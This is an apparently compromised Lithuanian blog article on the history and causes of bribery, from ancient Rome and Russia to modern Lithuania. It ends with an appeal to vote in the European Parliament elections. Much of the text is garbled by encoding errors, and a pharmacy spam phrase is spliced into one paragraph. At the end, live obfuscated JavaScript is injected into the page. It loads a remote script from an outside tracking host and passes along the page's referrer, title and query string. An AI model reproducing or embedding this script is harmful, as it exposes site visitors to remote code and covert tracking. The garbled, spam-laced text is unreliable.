KyA?ininkavimas prasidA�jo gilioje senovA�je

Viena iA? korupcijos formA? ir visuomenei labiausiai A?inomas yra kyA?ininkavimas. A�i forma yra tiesiogiai siejama su administracine korupcija, pagal kuriA� vertinamas vieA?A?jA? A?staigA? skaidrumas ir efektyvumas sprendA?iant visuomenei reikA?mingus uA?davinius. Juk vieA?A?jA? paslaugA? sistema turi veikti taip, kad kiekvienas asmuo gautA? kokybiA?kA� paslaugA� be jokiA? neteisA�tA? mokA�jimA?, o jos suteikimo mechanizmas bA�tA? teisA�tas, paprastas ir aiA?kus.

KyA?ininkavimas senovA�je

SenovA�s Romoje valdininkai iA? valstybA�s gaudavo net specialias a�zdovanasa�? produktais, kad dA�l menkA? atlyginimA? nebadautA? ir nepradA�tA? kyA?ininkauti. Daugiausia A?kliA�davo tik tie valdininkai, kurie ima per maA?ai, kad galA�tA? pasidalyti su kitais ir taip iA?vengti bausmA�s. Patys imperatoriai buvo renkami pagal kyA?io dydA?, nes valdovu tapdavo pretendentas, pasiA�lA�s imperatoriA?kajai gvardijai didesnA� a�zdovanA�a�?.

GraikA? raA?ytojas Pausanijas raA?A�, kad net olimpinA�se A?aidynA�se varA?ovA? ir teisA�jA? papirkinA�jimai nesiliovA� tol, kol imperatorius Teodosijus panaikino olimpines A?aidynes dA�l paplitusios korupcijos ir brutalumo.

Teigiama, kad Rusijoje kyA?iai minimi jau nuo XIII a. Ivanas III pirmasis iA? valdovA? pradA�jA�s bausti rykA?tA�mis ir rimbu uA? a�zdovanA�lesa�? tarnautojams. O Ivanas RA�stusis A?sakA� kyA?ininkavimu A?tariamus valdininkus sumesti A? upA�. Garsusis rusA? valdovas Petras I taip pat kovojo su korupcija, A?pykA�s caras net ketino iA?leisti A?sakA�, pagal kurA? reikA�tA? karti kiekvienA�, jei jo paimtA? kyA?iA? vertA�s pakanka virvei A?sigyti.

Galima teigti, kad gilioje senovA�je pagunda dovanoti, siekiant asmeninio pranaA?umo, valdA?ia naudojamasi sA�moningai. Kas stipresnis, tas ir laimi. Visais laikais buvo kovojama su Korupcijaa�� piktnaudA?iavimas patikA�ta galia siekiant asmeninA�s naudos. O daA?niausiai pasitaikanA?iosA�ir gerai visuomenA�je A?inoma korupcijos forma yra kyA?ininkavimas.

KyA?iai sprendA?ia problemas

Nors ilgA� laikA� kalbos apie kyA?ininkavimA� ir jo tyrimus buvo tabu arba atskiros A?alies reikalas. Tik visai neseniai tarptautiniu mastu imta kalbA�ti apie A?io reiA?kinio prieA?astis, esmA� ir pasekmes. KyA?ininkavimo problema aktuali visur ir visada. A�is reiA?kinys akcentuojamas ir politikA? savo kalbose ir spaudoje. KyA?iai tebelieka efektyvi verslo bendravimo su daugeliu institucijA? priemonA�.

KyA?ininkavimas yra vienas labiausiai slaptas, nematomas, iA?oriA?kai nepasireiA?kiantis nusikaltimas. Tai pripaA?A?sta absoliuti dauguma visuomenA�s nariA?, bet ta pati visuomenA� taip pat mano, kad kyA?iai padeda iA?sprA�sti iA?kilusias problemas

IA?vaistyti milijardai, nesuprantami teismA? sprendimai, valstybA�s tarnautojA? savivalA� ar policijos pareigA�nA? kyA?ininkavimas visA? pirma yra prasto valdymo pasekmA�s. PolitikA? ir valstybA�s tarnautojA? nenoras arba nesugebA�jimas pagrA?sti savo sprendimA?, efektyviai leisti mokesA?iA? mokA�tojA? pinigus ir uA?tikrinti kokybiA?kas paslaugas visuomenei A?lugdo A?moniA? pasitikA�jimA� valstybe ir atveria keliA� sukA?iavimui, kyA?ininkavimui.

PilieA?iai turi pasitikA�ti savo valdA?ios atstovais ir A?inoti, kad jiems tiesiog neapsimoka papirkinA�ti ar apgaudinA�ti valstybA�s, nes taip jie apgaudinA�ja patys save ir moka dukart.A�A?inant, kad vidutinis kyA?io dydis Lietuvoje svyruoja nuo 50 iki 100, nesunku suvokti, kad kyA?iams kasmet iA?leidA?iame milijonus litA?. list of reputable online pharmacies.

Dauguma lietuviA? vis dar tiki, kad kyA?is gali padA�ti iA?sprA�sti problemas ir yra pasiryA?A� jA? duoti. DaA?niausiai kyA?ininkavimo prieA?astis yra gan proziA?ka: A?monA�s duoda kyA?A?, nes mano, kad tai pagreitins arba palengvins sprendimA? priA�mimA�, o neduoda, kai neatsiduria situacijoje, kurioje iA? jA? bA�tA? reikalaujama papirkinA�ti.

Tuo naudojasi korumpuoti pareigA�nai, matydami kyA?io A�mimo finansinA� naudA�, daA?nai turi teisA� savo nuoA?iA�ra persitvarkyti veikla. Nenorintiems paklusti jie gali grasinti areA?tu ir patraukimu baudA?iamojon atsakomybei. Tokiais atvejais pareigA�nai gali teisinti kyA?ius kaip priemonA� dar didesnei A?alai iA?vengti, taA?iau sisteminiai nuostoliai vis dA�l to dideli.

Patys leidA?iam, Kad kyA?ininkavimas tA�stA?si

KyA?iA? mastai iA?augo dA�l visuomenA�s pragmatiA?kumo: pilieA?iai perka ne tik medikA?, A?vietimo darbuotojA? ar keliA? policininkA? paslaugas, bet ir teisA�jA?, politikA?, valdininkA? paslaugas, o tai kelia rimtA� grA�smA� teisinA�s valstybA�s egzistavimui.

PerA�jimas A? rinkos ekonomikA� nepanaikino buvusiA? socialiniA? negeroviA?, o kai kuriais atvejais dA�l pereinamojo proceso teisinio neapibrA�A?tumo, politinio ir pilietinio nesubrendimo buvo pretekstas naujoms kyA?ininkavimo apraiA?koms.

VartotojiA?kos, bet nebA�tinai pilietiA?kos, visuomenA�s prioritetai suponavo iA?augusius kyA?io davimo mastus ir davimo prieA?astis. Privatizacija, kaip bandymas sprA�sti vieA?ojo sektoriaus efektyvumo ir rezultatyvumo problemas, Lietuvoje davA� skirtingas pamokas: atvA�rA� kelius rinkos ekonomikai, leido valstybei sutaupyti, bet kartu leido atskiriems pareigA�nams, politikams, pasinaudojus tarnybine padA�timi, paA?intimis ir ryA?iais, tapti naujaisiais verslininkais likusios visuomenA�s sA�skaita.

KyA?ininkavimas turi liautis. VisA? pirmA� turim pradA�t nuo savA�s, o tada iA?rinkt A?mones, kurie kovotA? prieA? tai ir sprA�stA? A?iA� problemA� efektingai. Tik mes patys, geguA?A�s 25d. per Europos Parlamento rinkimus, galim nusprA�st, kas tai sustabdys.

juostelevar _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Latest posts by Violeta Papreckaitė, Marijampolė (see all)

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *